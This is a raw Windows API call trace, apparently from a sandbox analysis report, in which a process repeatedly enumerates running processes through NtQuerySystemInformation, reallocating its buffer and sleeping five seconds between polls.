0x0 [0140.152] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.154] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.155] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.167] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.167] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.168] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.170] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.170] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.183] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.183] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.183] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.187] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.198] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.198] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.198] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.201] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.202] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.213] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.214] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.214] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.214] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.215] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.217] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.218] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.229] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.229] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.230] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.230] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.233] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.252] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.253] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.253] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.256] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.256] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.260] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.260] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.260] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.261] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.261] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.263] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.264] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.277] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.277] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.277] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.280] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.292] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.292] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.292] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.295] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.295] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.309] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.309] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.310] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.312] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.323] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.324] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.324] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.324] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.327] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.328] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.338] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.338] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.339] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.339] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.341] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.342] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.356] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.356] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.356] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.357] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.357] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.359] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.360] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.369] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.370] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.370] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.371] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.373] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.389] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.390] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.390] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.393] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.394] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.400] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.401] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.402] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.402] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.402] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.406] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.416] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.417] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.420] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.421] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.436] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.437] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.448] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.449] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.449] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.452] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.452] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.464] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.464] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.465] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.466] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.468] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.469] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.478] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.479] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.480] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.480] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.480] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.483] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.483] 